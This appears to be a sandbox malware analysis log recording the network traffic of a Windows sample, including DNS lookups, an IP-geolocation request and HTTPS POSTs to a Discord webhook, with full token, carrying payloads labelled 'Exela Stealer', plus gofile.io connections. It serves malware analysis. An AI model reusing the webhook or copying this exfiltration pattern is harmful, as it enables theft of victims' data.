                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.327701092 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.327718019 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.330655098 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.330684900 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.330780983 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.331438065 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.331450939 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.642507076 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.643013954 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.643032074 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.644474030 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.644541979 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.645598888 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.645680904 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.645896912 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.645903111 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648124933 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648160934 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648328066 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648360968 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648530006 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648576021 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648685932 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648709059 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648844004 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.648859978 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649010897 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649040937 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649049997 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649055004 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649169922 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649194002 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649214029 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649226904 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649233103 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649316072 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649347067 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.649370909 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692121029 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692270041 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692289114 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692308903 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692317009 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692348003 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692362070 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692378044 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692384958 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692409992 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.692430019 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:22.028271914 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:22.028338909 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:22.028433084 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:22.029042006 CEST49755443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:22.029058933 CEST44349755162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.615154982 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.615205050 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.615422010 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.616121054 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.616137981 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.550395012 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.551021099 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.551058054 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.552089930 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.552155972 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.559876919 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.560147047 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.560193062 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.604125023 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.612072945 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.612087965 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:24.658921957 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.158529043 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.158731937 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.158829927 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.159213066 CEST49760443192.168.2.451.38.43.18
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.159233093 CEST4434976051.38.43.18192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.726398945 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.726458073 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.726522923 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.727128983 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.727148056 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.053272963 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.053920031 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.053946972 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.057466984 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.057538986 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.058491945 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.058584929 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.058793068 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.058806896 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.058986902 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.059609890 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.059655905 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.059845924 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.059887886 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.059981108 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.060151100 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.060153008 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.060167074 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.060551882 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.060614109 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:26.060645103 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.057750940 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.057943106 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.057996988 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.059165001 CEST49761443192.168.2.4206.168.191.31
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.059189081 CEST44349761206.168.191.31192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.062038898 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.062081099 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.062159061 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.062597990 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.062616110 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.377757072 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.378303051 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.378334999 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.381896019 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.381964922 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.382843971 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.383032084 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.383112907 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.383122921 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.383202076 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.424161911 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.888242006 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.888576984 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.888639927 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.888819933 CEST49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:28.888834953 CEST44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.022964954 CEST5781153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.177551985 CEST53578111.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.595778942 CEST5151553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.749699116 CEST53515151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.153984070 CEST5122853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.613862038 CEST53512281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.414225101 CEST5986953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.725238085 CEST53598691.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.022964954 CEST192.168.2.41.1.1.10x5900Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.595778942 CEST192.168.2.41.1.1.10x1ca6Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.153984070 CEST192.168.2.41.1.1.10x6186Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.414225101 CEST192.168.2.41.1.1.10x1975Standard query (0)store8.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.177551985 CEST1.1.1.1192.168.2.40x5900No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.749699116 CEST1.1.1.1192.168.2.40x1ca6No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.749699116 CEST1.1.1.1192.168.2.40x1ca6No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.749699116 CEST1.1.1.1192.168.2.40x1ca6No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.749699116 CEST1.1.1.1192.168.2.40x1ca6No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.749699116 CEST1.1.1.1192.168.2.40x1ca6No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.613862038 CEST1.1.1.1192.168.2.40x6186No error (0)api.gofile.io51.38.43.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.613862038 CEST1.1.1.1192.168.2.40x6186No error (0)api.gofile.io51.178.66.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:23.613862038 CEST1.1.1.1192.168.2.40x6186No error (0)api.gofile.io151.80.29.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:25.725238085 CEST1.1.1.1192.168.2.40x1975No error (0)store8.gofile.io206.168.191.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          • discord.com
                                                                                                                                                                                                                                                          • api.gofile.io
                                                                                                                                                                                                                                                          • store8.gofile.io
                                                                                                                                                                                                                                                          • ip-api.com
                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.449740208.95.112.1806816C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.347063065 CEST124OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                                          Host: ip-api.com
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.3
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.508085012 CEST456INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Wed, 24 Apr 2024 17:24:06 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 279
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          X-Ttl: 60
                                                                                                                                                                                                                                                          X-Rl: 44
                                                                                                                                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 56 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 22 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 22 7a 69 70 22 3a 22 38 39 31 30 31 22 2c 22 6c 61 74 22 3a 33 36 2e 31 36 38 35 2c 22 6c 6f 6e 22 3a 2d 31 31 35 2e 31 31 36 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 22 69 73 70 22 3a 22 41 53 31 37 34 22 2c 22 6f 72 67 22 3a 22 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 7d
                                                                                                                                                                                                                                                          Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NV","regionName":"Nevada","city":"Las Vegas","zip":"89101","lat":36.1685,"lon":-115.1164,"timezone":"America/Los_Angeles","isp":"AS174","org":"","as":"AS174 Cogent Communications","query":"154.16.105.36"}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.449751162.159.128.2334436816C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-04-24 17:24:19 UTC277OUTPOST /api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaLZ2C-YJ8xGzkF6VbqbsY0 HTTP/1.1
                                                                                                                                                                                                                                                          Host: discord.com
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.3
                                                                                                                                                                                                                                                          Content-Length: 1381
                                                                                                                                                                                                                                                          2024-04-24 17:24:19 UTC1381OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 20 46 75 6c 6c 20 49 6e 66 6f 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30
                                                                                                                                                                                                                                                          Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Exela Stealer Full Info***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0
                                                                                                                                                                                                                                                          2024-04-24 17:24:19 UTC1367INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                          Date: Wed, 24 Apr 2024 17:24:19 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          set-cookie: __dcfduid=7bd0627c025f11efa7d31a4199c9fe48; Expires=Mon, 23-Apr-2029 17:24:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1713979460
                                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fODZtPEW%2BMTNE%2BaVAjSqZSYXk1o3MBVDJIR7Nwuw2Hs3icT1kmLI%2F%2FoNzv7BLn8yylT04AkpCEqTHQhlfmk4Z8a0EUMSuZY3gnxp08DLvQHs5EAGZCb8x5Q2Gm2r"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                          Set-Cookie: __sdcfduid=7bd0627c025f11efa7d31a4199c9fe48c4f5e57f9711b81ede957149357073dc7775ed4571b99598883e1a480d310fd4; Expires=Mon, 23-Apr-2029 17:24:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                          Set-Cookie: __cfruid=22bfe7b5e874aa62114a8089515824a77160f218-1713979459; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                          2024-04-24 17:24:19 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 69 53 53 54 72 61 36 68 33 55 35 69 77 37 57 31 67 44 46 43 2e 42 67 48 67 66 50 55 74 35 47 55 6b 53 58 79 31 63 73 33 4c 46 34 2d 31 37 31 33 39 37 39 34 35 39 34 35 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 37 39 37 63 39 34 33 63 64 31 37 30 39 66 64 2d 4c 41 53 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: Set-Cookie: _cfuvid=iSSTra6h3U5iw7W1gDFC.BgHgfPUt5GUkSXy1cs3LF4-1713979459456-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8797c943cd1709fd-LAS
                                                                                                                                                                                                                                                          2024-04-24 17:24:19 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                          Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.449753162.159.128.2334436816C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-04-24 17:24:19 UTC276OUTPOST /api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaLZ2C-YJ8xGzkF6VbqbsY0 HTTP/1.1
                                                                                                                                                                                                                                                          Host: discord.com
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.3
                                                                                                                                                                                                                                                          Content-Length: 512
                                                                                                                                                                                                                                                          2024-04-24 17:24:19 UTC512OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 4b 65 79 77 6f 72 64 20 52 65 73 75 6c 74 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d
